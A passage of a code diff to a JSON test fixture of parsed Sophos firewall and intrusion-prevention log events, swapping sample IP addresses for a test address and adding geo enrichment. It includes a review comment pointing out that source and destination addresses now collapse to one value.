dir_disp=\"\" connevent=\"Interim\" connid=\"2685668438\" vconnid=\"\" hb_health=\"No Heartbeat\" message=\"\" appresolvedby=\"Signature\" app_is_cloud=0", "code": "018201500005", "kind": "event", "start": "2020-05-18T14:38:45.000Z", @@ -6064,16 +6301,33 @@ "port": 88, "bytes": 1732, "packets": 6, - "ip": "172.16.34.10" + "ip": "175.16.199.1" }, "log": { "level": "informational" }, "destination": { + "geo": { + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_name": "China", + "region_name": "Jilin", + "location": { + "lon": 125.3228, + "lat": 43.88 + }, + "country_iso_code": "CN" + }, + "as": { + "number": 4837, + "organization": { + "name": "CHINA UNICOM China169 Backbone" + } + }, "port": 88, "bytes": 1732, "packets": 6, - "ip": "172.16.34.10" + "ip": "175.16.199.1" }, "rule": { "ruleset": "1", @@ -6083,11 +6337,28 @@ "nat": { "port": 0 }, + "geo": { + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_name": "China", + "region_name": "Jilin", + "location": { + "lon": 125.3228, + "lat": 43.88 + }, + "country_iso_code": "CN" + }, + "as": { + "number": 4837, + "organization": { + "name": "CHINA UNICOM China169 Backbone" + } + }, "port": 61925, "bytes": 1802, + "ip": "175.16.199.1", "mac": "00:00:00:00:00:00", - "packets": 6, - "ip": "172.17.35.119" + "packets": 6 }, "tags": [ "preserve_original_event" @@ -6123,8 +6394,7 @@ "defaulttest.local" ], "ip": [ - "172.17.35.119", - "172.16.34.10" + "175.16.199.1" ] }, "sophos": { 
@@ -6161,13 +6431,13 @@ "bytes": 1802, "mac": "00:00:00:00:00:00", "packets": 6, - "ip": "172.17.35.119" + "ip": "175.16.199.1" }, "event": { "duration": 10000000000, "severity": 6, - "ingested": "2021-06-30T11:19:55.566448800Z", - "original": "device=\"SFW\" date=2020-06-05 time=12:38:53 timezone=\"CEST\" device_name=\"XG230\" device_id=1234567890123457 log_id=010101600001 log_type=\"Firewall\" log_component=\"Firewall Rule\" log_subtype=\"Allowed\" status=\"Allow\" priority=Information duration=10 fw_rule_id=60 policy_type=1 user_name=\"\" user_gp=\"\" iap=0 ips_policy_id=17 appfilter_policy_id=0 application=\"\" application_risk=0 application_technology=\"\" application_category=\"\" in_interface=\"ipsec0\" out_interface=\"Port1\" src_mac=00:00:00:00:00:00 src_ip=172.17.35.119 src_country_code=R1 dst_ip=172.16.34.10 dst_country_code=R1 protocol=\"TCP\" src_port=61925 dst_port=88 sent_pkts=6 recv_pkts=6 sent_bytes=1802 recv_bytes=1732 tran_src_ip= tran_src_port=0 tran_dst_ip= tran_dst_port=0srczonetype=\"VPN\" srczone=\"VPN\" dstzonetype=\"LAN\" dstzone=\"LAN\" dir_disp=\"\" connevent=\"Stop\" connid=\"1617126256\" vconnid=\"\" hb_health=\"NoHeartbeat\" message=\"\" appresolvedby=\"Signature\" app_is_cloud=0\"", + "ingested": "2021-12-09T13:44:55.715460200Z", + "original": "device=\"SFW\" date=2020-06-05 time=12:38:53 timezone=\"CEST\" device_name=\"XG230\" device_id=1234567890123457 log_id=010101600001 log_type=\"Firewall\" log_component=\"Firewall Rule\" log_subtype=\"Allowed\" status=\"Allow\" priority=Information duration=10 fw_rule_id=60 policy_type=1 user_name=\"\" user_gp=\"\" iap=0 ips_policy_id=17 appfilter_policy_id=0 application=\"\" application_risk=0 application_technology=\"\" application_category=\"\" in_interface=\"ipsec0\" out_interface=\"Port1\" src_mac=00:00:00:00:00:00 src_ip=175.16.199.1 src_country_code=R1 dst_ip=175.16.199.1 dst_country_code=R1 protocol=\"TCP\" src_port=61925 dst_port=88 sent_pkts=6 recv_pkts=6 sent_bytes=1802 
recv_bytes=1732 tran_src_ip= tran_src_port=0 tran_dst_ip= tran_dst_port=0srczonetype=\"VPN\" srczone=\"VPN\" dstzonetype=\"LAN\" dstzone=\"LAN\" dir_disp=\"\" connevent=\"Stop\" connid=\"1617126256\" vconnid=\"\" hb_health=\"NoHeartbeat\" message=\"\" appresolvedby=\"Signature\" app_is_cloud=0\"", "code": "010101600001", "kind": "event", "start": "2020-06-05T12:38:53.000Z", @@ -6192,7 +6462,7 @@ "port": 0, "bytes": 0, "packets": 0, - "ip": "8.8.8.8" + "ip": "175.16.199.1" }, "log": { "level": "informational" @@ -6202,23 +6472,25 @@ "port": 0 }, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_name": "China", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 + "lon": 125.3228, + "lat": 43.88 }, - "country_iso_code": "US" + "country_iso_code": "CN" }, "as": { - "number": 15169, + "number": 4837, "organization": { - "name": "Google LLC" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 0, "bytes": 0, - "ip": "8.8.8.8", + "ip": "175.16.199.1", "packets": 0 }, "rule": { @@ -6258,7 +6530,7 @@ ], "ip": [ "10.198.32.19", - "8.8.8.8" + "175.16.199.1" ] }, "sophos": { 
@@ -6295,8 +6567,8 @@ "event": { "duration": 0, "severity": 6, - "ingested": "2021-06-30T11:19:55.566455100Z", - "original": "device=\"SFW\" date=2018-05-30 time=13:26:37 timezone=\"IST\" device_name=\"XG125w\" device_id=SFDemo-763180a log_id=010202601001 log_type=\"Firewall\" log_component=\"Invalid Traffic\" log_subtype=\"Denied\" status=\"Deny\" priority=Information duration=0 fw_rule_id=0 policy_type=0 user_name=\"\" user_gp=\"\" iap=0 ips_policy_id=0 appfilter_policy_id=0 application=\"\" application_risk=0 application_technology=\"\" application_category=\"\" in_interface=\"\" out_interface=\"\" src_mac= src_ip=10.198.32.19 src_country_code= dst_ip=8.8.8.8 dst_country_code= protocol=\"UDP\" src_port=1353 dst_port=0 sent_pkts=0 recv_pkts=0 sent_bytes=0 recv_bytes=0 tran_src_ip= tran_src_port=0 tran_dst_ip= tran_dst_port=0 srczonetype=\"\" srczone=\"\" dstzonetype=\"\" dstzone=\"\" dir_disp=\"\" connid=\"\" vconnid=\"\" hb_health=\"No Heartbeat\" message=\"Invalid UDP destination.\" appresolvedby=\" Signature\"", + "ingested": "2021-12-09T13:44:55.715466Z", + "original": "device=\"SFW\" date=2018-05-30 time=13:26:37 timezone=\"IST\" device_name=\"XG125w\" device_id=SFDemo-763180a log_id=010202601001 log_type=\"Firewall\" log_component=\"Invalid Traffic\" log_subtype=\"Denied\" status=\"Deny\" priority=Information duration=0 fw_rule_id=0 policy_type=0 user_name=\"\" user_gp=\"\" iap=0 ips_policy_id=0 appfilter_policy_id=0 application=\"\" application_risk=0 application_technology=\"\" application_category=\"\" in_interface=\"\" out_interface=\"\" src_mac= src_ip=10.198.32.19 src_country_code= dst_ip=175.16.199.1 dst_country_code= protocol=\"UDP\" src_port=1353 dst_port=0 sent_pkts=0 recv_pkts=0 sent_bytes=0 recv_bytes=0 tran_src_ip= tran_src_port=0 tran_dst_ip= tran_dst_port=0 srczonetype=\"\" srczone=\"\" dstzonetype=\"\" dstzone=\"\" dir_disp=\"\" connid=\"\" vconnid=\"\" hb_health=\"No Heartbeat\" message=\"Invalid UDP destination.\" appresolvedby=\" 
Signature\"", "code": "010202601001", "kind": "event", "start": "2018-05-30T13:26:37.000Z", @@ -6406,7 +6678,7 @@ "event": { "duration": 0, "severity": 6, - "ingested": "2021-06-30T11:19:55.566462300Z", + "ingested": "2021-12-09T13:44:55.715471900Z", "original": "device=\"SFW\" date=2018-06-04 time=17:20:24 timezone=\"IST\" device_name=\"XG125w\" device_id=SFDemo-763180a log_id=011402601301 log_type=\"Firewall\" log_component=\"Fragmented Traffic\" log_subtype=\"Denied\" status=\"Deny\" priority=Information duration=0 fw_rule_id=0 policy_type=0 user_name=\"\" user_gp=\"\" iap=0 ips_policy_id=0 appfilter_policy_id=0 application=\"\" application_risk=0 application_technology=\"\" application_category=\"\" in_interface=\"\" out_interface=\"\" src_mac= src_ip=0.0.0.0 src_country_code= dst_ip=0.0.0.0 dst_country_code= protocol=\"0\" src_port=0 dst_port=0 sent_pkts=0 recv_pkts=0 sent_bytes=0 recv_bytes=0 tran_src_ip= tran_src_port=0 tran_dst_ip= tran_dst_port=0 srczonetype=\"\" srczone=\"\" dstzonetype=\"\" dstzone=\"\" dir_disp=\"\" connid=\"\" vconnid=\"\" hb_health=\"No Heartbeat\" message=\"\" appresolvedby=\"Signature\"", "code": "011402601301", "kind": "event", 
@@ -6525,7 +6797,7 @@ "event": { "duration": 0, "severity": 6, - "ingested": "2021-06-30T11:19:55.566469600Z", + "ingested": "2021-12-09T13:44:55.715564300Z", "original": "device=\"SFW\" date=2018-05-30 time=14:01:32 timezone=\"IST\" device_name=\"XG125w\" device_id=SFDemo-763180a log_id=010302602002 log_type=\"Firewall\" log_component=\"Appliance Access\" log_subtype=\"Denied\" status=\"Deny\" priority=Information duration=0 fw_rule_id=2 policy_type=0 user_name=\"\" user_gp=\"\" iap=0 ips_policy_id=0 appfilter_policy_id=0 application=\"\" application_risk=0 application_technology=\"\" application_category=\"\" in_interface=\"Port2.611\" out_interface=\"\" src_mac=c8:5b:76:ab:72:d3 src_ip=10.198.38.184 src_country_code= dst_ip=10.198.39.255 dst_country_code= protocol=\"UDP\" src_port=137 dst_port=137 sent_pkts=0 recv_pkts=0 sent_bytes=0 recv_bytes=0 tran_src_ip= tran_src_port=0 tran_dst_ip= tran_dst_port=0 srczonetype=\"\" srczone=\"\" dstzonetype=\"\" dstzone=\"\" dir_disp=\"\" connid=\"\" vconnid=\"\" hb_health=\"No Heartbeat\" message=\"\" appresolvedby=\"Signature\"", "code": "010302602002", "kind": "event", 
@@ -6644,7 +6916,7 @@ "event": { "duration": 0, "severity": 4, - "ingested": "2021-06-30T11:19:55.566481Z", + "ingested": "2021-12-09T13:44:55.715571Z", "original": "device=\"SFW\" date=2018-05-30 time=14:17:17 timezone=\"IST\" device_name=\"XG125w\" device_id=SFDemo-763180a log_id=010402403001 log_type=\"Firewall\" log_component=\"DoS Attack\" log_subtype=\"Denied\" status=\"Deny\" priority=Warning duration=0 fw_rule_id=0 policy_type=0 user_name=\"\" user_gp=\"\" iap=0 ips_policy_id=0 appfilter_policy_id=0 application=\"\" application_risk=0 application_technology=\"\" application_category=\"\" in_interface=\"Port1\" out_interface=\"\" src_mac=b8:97:5a:5b:0f:fd src_ip=10.198.32.19 src_country_code= dst_ip=10.198.32.48 dst_country_code= protocol=\"TCP\" src_port=41960 dst_port=22 sent_pkts=0 recv_pkts=0 sent_bytes=0 recv_bytes=0 tran_src_ip= tran_src_port=0 tran_dst_ip= tran_dst_port=0 srczonetype=\"\" srczone=\"\" dstzonetype=\"\" dstzone=\"\" dir_disp=\"\" connid=\"\" vconnid=\"\" hb_health=\"No Heartbeat\" message=\"\" appresolvedby=\" Signature\"", "code": "010402403001", "kind": "alert", 
@@ -6755,7 +7027,7 @@ "event": { "duration": 0, "severity": 6, - "ingested": "2021-06-30T11:19:55.566488600Z", + "ingested": "2021-12-09T13:44:55.715577Z", "original": "device=\"SFW\" date=2018-06-05 time=14:30:31 timezone=\"IST\" device_name=\"XG125w\" device_id=SFDemo-763180a log_id=010502604001 log_type=\"Firewall\" log_component=\"ICMP Redirection\" log_subtype=\"Denied\" status=\"Deny\" priority=Information duration=0 fw_rule_id=0 policy_type=0 user_name=\"\" user_gp=\"\" iap=0 ips_policy_id=0 appfilter_policy_id=0 application=\"\" application_risk=0 application_technology=\"\" application_category=\"\" in_interface=\"\" out_interface=\"\" src_mac= src_ip=10.198.37.23 src_country_code= dst_ip=10.198.36.48 dst_country_code= protocol=\"ICMP\" icmp_type=5 icmp_code=1 sent_pkts=0 recv_pkts=0 sent_bytes=0 recv_bytes=0 tran_src_ip= tran_src_port=0 tran_dst_ip= tran_dst_port=0 srczonetype=\"\" srczone=\"\" dstzonetype=\"\" dstzone=\"\" dir_disp=\"\" connid=\"\" vconnid=\"\" hb_health=\"No Heartbeat\" message=\"\" appresolvedby=\" Signature\"", "code": "010502604001", "kind": "event", @@ -6780,7 +7052,7 @@ "port": 80, "bytes": 0, "packets": 0, - "ip": "8.8.8.8" + "ip": "175.16.199.1" }, "log": { "level": "informational" @@ -6790,23 +7062,25 @@ "port": 0 }, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_name": "China", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 + "lon": 125.3228, + "lat": 43.88 }, - "country_iso_code": "US" + "country_iso_code": "CN" }, "as": { - "number": 15169, + "number": 4837, "organization": { - "name": "Google LLC" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, "bytes": 0, - "ip": "8.8.8.8", + "ip": "175.16.199.1", "packets": 0 }, "rule": { @@ -6846,7 +7120,7 @@ ], "ip": [ "10.198.12.19", - "8.8.8.8" + "175.16.199.1" ] }, "sophos": { 
@@ -6882,8 +7156,8 @@ "event": { "duration": 0, "severity": 6, - "ingested": "2021-06-30T11:19:55.566495800Z", - "original": "device=\"SFW\" date=2018-05-31 time=17:05:14 timezone=\"IST\" device_name=\"XG125w\" device_id=SFDemo-763180a log_id=010602605001 log_type=\"Firewall\" log_component=\"Source Routed\" log_subtype=\"Denied\" status=\"Deny\" priority=Information duration=0 fw_rule_id=1 policy_type=1 user_name=\"\" user_gp=\"\" iap=0 ips_policy_id=0 appfilter_policy_id=0 application=\"\" application_risk=0 application_technology=\"\" application_category=\"\" in_interface=\"\" out_interface=\"\" src_mac= src_ip=10.198.12.19 src_country_code= dst_ip=8.8.8.8 dst_country_code= protocol=\"TCP\" src_port=1571 dst_port=80 sent_pkts=0 recv_pkts=0 sent_bytes=0 recv_bytes=0 tran_src_ip= tran_src_port=0 tran_dst_ip= tran_dst_port=0 srczonetype=\"\" srczone=\"\" dstzonetype=\"\" dstzone=\"\" dir_disp=\"\" connid=\"\" vconnid=\"\" hb_health=\"No Heartbeat\" message=\"\" appresolvedby=\"Signature\"", + "ingested": "2021-12-09T13:44:55.715583100Z", + "original": "device=\"SFW\" date=2018-05-31 time=17:05:14 timezone=\"IST\" device_name=\"XG125w\" device_id=SFDemo-763180a log_id=010602605001 log_type=\"Firewall\" log_component=\"Source Routed\" log_subtype=\"Denied\" status=\"Deny\" priority=Information duration=0 fw_rule_id=1 policy_type=1 user_name=\"\" user_gp=\"\" iap=0 ips_policy_id=0 appfilter_policy_id=0 application=\"\" application_risk=0 application_technology=\"\" application_category=\"\" in_interface=\"\" out_interface=\"\" src_mac= src_ip=10.198.12.19 src_country_code= dst_ip=175.16.199.1 dst_country_code= protocol=\"TCP\" src_port=1571 dst_port=80 sent_pkts=0 recv_pkts=0 sent_bytes=0 recv_bytes=0 tran_src_ip= tran_src_port=0 tran_dst_ip= tran_dst_port=0 srczonetype=\"\" srczone=\"\" dstzonetype=\"\" dstzone=\"\" dir_disp=\"\" connid=\"\" vconnid=\"\" hb_health=\"No Heartbeat\" message=\"\" appresolvedby=\"Signature\"", "code": "010602605001", "kind": "alert", 
"start": "2018-05-31T17:05:14.000Z",
@@ -7002,7 +7276,7 @@
 "event": {
 "duration": 0,
 "severity": 6,
- "ingested": "2021-06-30T11:19:55.566503900Z",
+ "ingested": "2021-12-09T13:44:55.715589Z",
 "original": "device=\"SFW\" date=2018-05-30 time=15:09:51 timezone=\"IST\" device_name=\"XG125w\" device_id=SFDemo-763180a log_id=011702605051 log_type=\"Firewall\" log_component=\"MAC Filter\" log_subtype=\"Denied\" status=\"Deny\" priority=Information duration=0 fw_rule_id=0 policy_type=0 user_name=\"\" user_gp=\"\" iap=0 ips_policy_id=0 appfilter_policy_id=0 application=\"\" application_risk=0 application_technology=\"\" application_category=\"\" in_interface=\"Port2.531\" out_interface=\"\" src_mac=1e:3a:5a:5b:23:ab src_ip=fe80::59f5:3ce8:c98e:5062 src_country_code= dst_ip=ff02::1:2 dst_country_code= protocol=\"UDP\" src_port=546 dst_port=547 sent_pkts=0 recv_pkts=0 sent_bytes=0 recv_bytes=0 tran_src_ip= tran_src_port=0 tran_dst_ip= tran_dst_port=0 srczonetype=\"\" srczone=\"\" dstzonetype=\"\" dstzone=\"\" dir_disp=\"\" connid=\"\" vconnid=\"\" hb_health=\"No Heartbeat\" message=\"\" appresolvedby=\"Signature\"",
 "code": "011702605051",
 "kind": "event",
@@ -7120,7 +7394,7 @@ "event": { "duration": 0, "severity": 6, - "ingested": "2021-06-30T11:19:55.566511300Z", + "ingested": "2021-12-09T13:44:55.715594900Z", "original": "device=\"SFW\" date=2018-06-01 time=10:57:55 timezone=\"BST\" device_name=\"XG310\" device_id=SFDemo-9a04c43 log_id=016602600006 log_type=\"Firewall\" log_component=\"Heartbeat\" log_subtype=\"Denied\" status=\"Deny\" priority=Information duration=0 fw_rule_id=16 policy_type=1 user_name=\"\" user_gp=\"\" iap=2 ips_policy_id=0 appfilter_policy_id=0 application=\"\" application_risk=0 application_technology=\"\" application_category=\"\" in_interface=\"Port3.611\" out_interface=\"\" src_mac=08:00:27:4c:49:e3 src_ip=10.198.37.57 src_country_code= dst_ip=10.198.32.19 dst_country_code= protocol=\"ICMP\" icmp_type=8 icmp_code=0 sent_pkts=0 recv_pkts=0 sent_bytes=0 recv_bytes=0 tran_src_ip= tran_src_port=0 tran_dst_ip= tran_dst_port=0 srczonetype=\"\" srczone=\"\" dstzonetype=\"\" dstzone=\"\" dir_disp=\"\" connid=\"\" vconnid=\"\" hb_health=\"Red\" message=\"\" appresolvedby=\"Signature\" app_is_cloud=0", "code": "016602600006", "kind": "event", @@ -7144,7 +7418,7 @@ }, "bytes": 0, "packets": 0, - "ip": "72.163.4.185" + "ip": "175.16.199.1" }, "log": { "level": "informational" @@ -7154,26 +7428,25 @@ "port": 0 }, "geo": { - "continent_name": "North America", - "region_iso_code": "US-TX", - "city_name": "Richardson", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Texas", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_name": "China", + "region_name": "Jilin", "location": { - "lon": -96.7028, - "lat": 32.9473 - } + "lon": 125.3228, + "lat": 43.88 + }, + "country_iso_code": "CN" }, "as": { - "number": 109, + "number": 4837, "organization": { - "name": "Cisco Systems, Inc." + "name": "CHINA UNICOM China169 Backbone" } }, "bytes": 0, "packets": 0, - "ip": "72.163.4.185" + "ip": "175.16.199.1" }, "rule": { "ruleset": "1", 
@@ -7217,7 +7490,7 @@
 ],
 "ip": [
 "10.198.37.57",
- "72.163.4.185"
+ "175.16.199.1"
 ]
 },
 "sophos": {
@@ -7256,8 +7529,8 @@ "event": { "duration": 0, "severity": 6, - "ingested": "2021-06-30T11:19:55.566518600Z", - "original": "device=\"SFW\" date=2018-06-01 time=10:55:41 timezone=\"BST\" device_name=\"XG310\" device_id=SFDemo-9a04c43 log_id=016602600003 log_type=\"Firewall\" log_component=\"Heartbeat\" log_subtype=\"Denied\" status=\"Deny\" priority=Information duration=0 fw_rule_id=16 policy_type=1 user_name=\"\" user_gp=\"\" iap=2 ips_policy_id=0 appfilter_policy_id=0 application=\"\" application_risk=0 application_technology=\"\" application_category=\"\" in_interface=\"Port3.611\" out_interface=\"\" src_mac=08:00:27:4c:49:e3 src_ip=10.198.37.57 src_country_code= dst_ip=72.163.4.185 dst_country_code= protocol=\"ICMP\" icmp_type=8 icmp_code=0 sent_pkts=0 recv_pkts=0 sent_bytes=0 recv_bytes=0 tran_src_ip= tran_src_port=0 tran_dst_ip= tran_dst_port=0 srczonetype=\"\" srczone=\"\" dstzonetype=\"\" dstzone=\"\" dir_disp=\"\" connid=\"\" vconnid=\"\" hb_health=\"Red\" message=\"\" appresolvedby=\"Signature\" app_is_cloud=0", + "ingested": "2021-12-09T13:44:55.715600800Z", + "original": "device=\"SFW\" date=2018-06-01 time=10:55:41 timezone=\"BST\" device_name=\"XG310\" device_id=SFDemo-9a04c43 log_id=016602600003 log_type=\"Firewall\" log_component=\"Heartbeat\" log_subtype=\"Denied\" status=\"Deny\" priority=Information duration=0 fw_rule_id=16 policy_type=1 user_name=\"\" user_gp=\"\" iap=2 ips_policy_id=0 appfilter_policy_id=0 application=\"\" application_risk=0 application_technology=\"\" application_category=\"\" in_interface=\"Port3.611\" out_interface=\"\" src_mac=08:00:27:4c:49:e3 src_ip=10.198.37.57 src_country_code= dst_ip=175.16.199.1 dst_country_code= protocol=\"ICMP\" icmp_type=8 icmp_code=0 sent_pkts=0 recv_pkts=0 sent_bytes=0 recv_bytes=0 tran_src_ip= tran_src_port=0 tran_dst_ip= tran_dst_port=0 srczonetype=\"\" srczone=\"\" dstzonetype=\"\" dstzone=\"\" dir_disp=\"\" connid=\"\" vconnid=\"\" hb_health=\"Red\" message=\"\" appresolvedby=\"Signature\" 
app_is_cloud=0", "code": "016602600003", "kind": "alert", "start": "2018-06-01T10:55:41.000Z", @@ -7277,14 +7550,31 @@ { "server": { "port": 80, - "ip": "172.16.68.20" + "ip": "175.16.199.1" }, "log": { "level": "warning" }, "destination": { + "geo": { + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_name": "China", + "region_name": "Jilin", + "location": { + "lon": 125.3228, + "lat": 43.88 + }, + "country_iso_code": "CN" + }, + "as": { + "number": 4837, + "organization": { + "name": "CHINA UNICOM China169 Backbone" + } + }, "port": 80, - "ip": "172.16.68.20" + "ip": "175.16.199.1" }, "rule": { "name": "SERVER-WEBAPP bad HTTP 1.1 request - potential worm attack", @@ -7293,22 +7583,24 @@ }, "source": { "geo": { - "continent_name": "Europe", - "country_name": "Romania", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_name": "China", + "region_name": "Jilin", "location": { - "lon": 25.0, - "lat": 46.0 + "lon": 125.3228, + "lat": 43.88 }, - "country_iso_code": "RO" + "country_iso_code": "CN" }, "as": { - "number": 28684, + "number": 4837, "organization": { - "name": "Bestnet Service SRL" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 41528, - "ip": "89.40.182.58" + "ip": "175.16.199.1" }, "tags": [ "preserve_original_event" @@ -7331,8 +7623,7 @@ "testhost.local" ], "ip": [ - "89.40.182.58", - "172.16.68.20" + "175.16.199.1" ] }, "sophos": { 
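Review bot: In the hunks starting at `@@ -7277` and `@@ -7293` the source address `89.40.182.58` and the destination address `172.16.68.20` are both rewritten to `175.16.199.1`, so `source.ip`, `destination.ip`, `client.ip` and `server.ip` now carry the same value and `related.ip` collapses to a single entry; a pipeline regression that swapped source and destination (or client and server) would no longer be caught by this fixture. The same collapse repeats in the hunks on the following lines (`@@ -7382`, `@@ -7489`, `@@ -8211`, `@@ -8337` and `@@ -8662`), so the fix is best applied once by choosing two distinct addresses from the supported test subset for the source and destination sides. Replacing the RFC 1918 destination `172.16.68.20` with a public address also adds `destination.geo` and `destination.as` blocks that did not exist before, which looks like it removes coverage of the private-destination (no enrichment) path unless another event in the file still exercises it. The unchanged `src_country_code=ROU` in `event.original` now disagrees with the geo enrichment reporting `CN` for the same address; that is harmless to the parser but reads oddly as sample data.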
@@ -7359,12 +7650,12 @@ }, "client": { "port": 41528, - "ip": "89.40.182.58" + "ip": "175.16.199.1" }, "event": { "severity": 4, - "ingested": "2021-06-30T11:19:55.566526Z", - "original": "device=\"SFW\" date=2020-05-18 time=14:38:54 timezone=\"CEST\" device_name=\"XG230\" device_id=1234567890123456 log_id=020804407002 log_type=\"IDP\" log_component=\"Signatures\" log_subtype=\"Drop\" priority=Warning idp_policy_id=7 fw_rule_id=25 user_name=\"\" signature_id=1881 signature_msg=\"SERVER-WEBAPP bad HTTP 1.1 request - potential worm attack\" classification=\"access to a potentially vulnerable web application\" rule_priority=2 src_ip=89.40.182.58 src_country_code=ROU dst_ip=172.16.68.20 dst_country_code=R1 protocol=\"TCP\" src_port=41528 dst_port=80 platform=\"BSD,Linux,Mac,Other,Solaris,Unix,Windows\" category=\"server-webapp\" target=\"Server\"", + "ingested": "2021-12-09T13:44:55.715606900Z", + "original": "device=\"SFW\" date=2020-05-18 time=14:38:54 timezone=\"CEST\" device_name=\"XG230\" device_id=1234567890123456 log_id=020804407002 log_type=\"IDP\" log_component=\"Signatures\" log_subtype=\"Drop\" priority=Warning idp_policy_id=7 fw_rule_id=25 user_name=\"\" signature_id=1881 signature_msg=\"SERVER-WEBAPP bad HTTP 1.1 request - potential worm attack\" classification=\"access to a potentially vulnerable web application\" rule_priority=2 src_ip=175.16.199.1 src_country_code=ROU dst_ip=175.16.199.1 dst_country_code=R1 protocol=\"TCP\" src_port=41528 dst_port=80 platform=\"BSD,Linux,Mac,Other,Solaris,Unix,Windows\" category=\"server-webapp\" target=\"Server\"", "code": "020804407002", "kind": "alert", "action": "drop", 
@@ -7382,14 +7673,31 @@ { "server": { "port": 53, - "ip": "172.16.66.155" + "ip": "175.16.199.1" }, "log": { "level": "warning" }, "destination": { + "geo": { + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_name": "China", + "region_name": "Jilin", + "location": { + "lon": 125.3228, + "lat": 43.88 + }, + "country_iso_code": "CN" + }, + "as": { + "number": 4837, + "organization": { + "name": "CHINA UNICOM China169 Backbone" + } + }, "port": 53, - "ip": "172.16.66.155" + "ip": "175.16.199.1" }, "rule": { "name": "PROTOCOL-DNS named version attempt", @@ -7399,23 +7707,23 @@ "source": { "geo": { "continent_name": "Asia", - "region_iso_code": "CN-SH", + "region_iso_code": "CN-JL", "country_name": "China", - "region_name": "Shanghai", + "region_name": "Jilin", "location": { - "lon": 121.4012, - "lat": 31.0449 + "lon": 125.3228, + "lat": 43.88 }, "country_iso_code": "CN" }, "as": { - "number": 4808, + "number": 4837, "organization": { - "name": "China Unicom Beijing Province Network" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 58914, - "ip": "117.50.11.192" + "ip": "175.16.199.1" }, "tags": [ "preserve_original_event" @@ -7438,8 +7746,7 @@ "testhost.local" ], "ip": [ - "117.50.11.192", - "172.16.66.155" + "175.16.199.1" ] }, "sophos": { 
@@ -7466,12 +7773,12 @@ }, "client": { "port": 58914, - "ip": "117.50.11.192" + "ip": "175.16.199.1" }, "event": { "severity": 4, - "ingested": "2021-06-30T11:19:55.566532600Z", - "original": "device=\"SFW\" date=2020-05-18 time=14:38:55 timezone=\"CEST\" device_name=\"XG230\" device_id=1234567890123456 log_id=020804407002 log_type=\"IDP\" log_component=\"Signatures\" log_subtype=\"Drop\" priority=Warning idp_policy_id=7 fw_rule_id=23 user_name=\"\" signature_id=1616 signature_msg=\"PROTOCOL-DNS named version attempt\" classification=\"Attempted Information Leak\" rule_priority=1 src_ip=117.50.11.192 src_country_code=CHN dst_ip=172.16.66.155 dst_country_code=R1 protocol=\"UDP\" src_port=58914 dst_port=53 platform=\"BSD,Linux,Mac,Other,Solaris,Unix,Windows\" category=\"protocol-dns\" target=\"Server\"", + "ingested": "2021-12-09T13:44:55.715612800Z", + "original": "device=\"SFW\" date=2020-05-18 time=14:38:55 timezone=\"CEST\" device_name=\"XG230\" device_id=1234567890123456 log_id=020804407002 log_type=\"IDP\" log_component=\"Signatures\" log_subtype=\"Drop\" priority=Warning idp_policy_id=7 fw_rule_id=23 user_name=\"\" signature_id=1616 signature_msg=\"PROTOCOL-DNS named version attempt\" classification=\"Attempted Information Leak\" rule_priority=1 src_ip=175.16.199.1 src_country_code=CHN dst_ip=175.16.199.1 dst_country_code=R1 protocol=\"UDP\" src_port=58914 dst_port=53 platform=\"BSD,Linux,Mac,Other,Solaris,Unix,Windows\" category=\"protocol-dns\" target=\"Server\"", "code": "020804407002", "kind": "alert", "action": "drop", 
@@ -7489,14 +7796,31 @@ { "server": { "port": 80, - "ip": "172.16.68.20" + "ip": "175.16.199.1" }, "log": { "level": "warning" }, "destination": { + "geo": { + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_name": "China", + "region_name": "Jilin", + "location": { + "lon": 125.3228, + "lat": 43.88 + }, + "country_iso_code": "CN" + }, + "as": { + "number": 4837, + "organization": { + "name": "CHINA UNICOM China169 Backbone" + } + }, "port": 80, - "ip": "172.16.68.20" + "ip": "175.16.199.1" }, "rule": { "name": "SERVER-WEBAPP DrayTek multiple products command injection attempt", @@ -7505,22 +7829,24 @@ }, "source": { "geo": { - "continent_name": "Europe", - "country_name": "Netherlands", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_name": "China", + "region_name": "Jilin", "location": { - "lon": 4.8995, - "lat": 52.3824 + "lon": 125.3228, + "lat": 43.88 }, - "country_iso_code": "NL" + "country_iso_code": "CN" }, "as": { - "number": 1136, + "number": 4837, "organization": { - "name": "KPN B.V." + "name": "CHINA UNICOM China169 Backbone" } }, "port": 59476, - "ip": "77.61.185.101" + "ip": "175.16.199.1" }, "tags": [ "preserve_original_event" @@ -7543,8 +7869,7 @@ "defaulttest.local" ], "ip": [ - "77.61.185.101", - "172.16.68.20" + "175.16.199.1" ] }, "sophos": { 
@@ -7571,12 +7896,12 @@ }, "client": { "port": 59476, - "ip": "77.61.185.101" + "ip": "175.16.199.1" }, "event": { "severity": 4, - "ingested": "2021-06-30T11:19:55.566535900Z", - "original": "device=\"SFW\" date=2020-05-18 time=14:38:56 timezone=\"CEST\" device_name=\"XG230\" device_id=1234567890123457 log_id=020804407002 log_type=\"IDP\" log_component=\"Signatures\" log_subtype=\"Drop\" priority=Warning idp_policy_id=7 fw_rule_id=25 user_name=\"\" signature_id=53589 signature_msg=\"SERVER-WEBAPP DrayTek multiple products command injection attempt\" classification=\"Web Application Attack\" rule_priority=2 src_ip=77.61.185.101 src_country_code=NLD dst_ip=172.16.68.20 dst_country_code=R1 protocol=\"TCP\" src_port=59476 dst_port=80 platform=\"Linux,Mac,Other,Unix,Windows\" category=\"server-webapp\" target=\"Server\"", + "ingested": "2021-12-09T13:44:55.715618700Z", + "original": "device=\"SFW\" date=2020-05-18 time=14:38:56 timezone=\"CEST\" 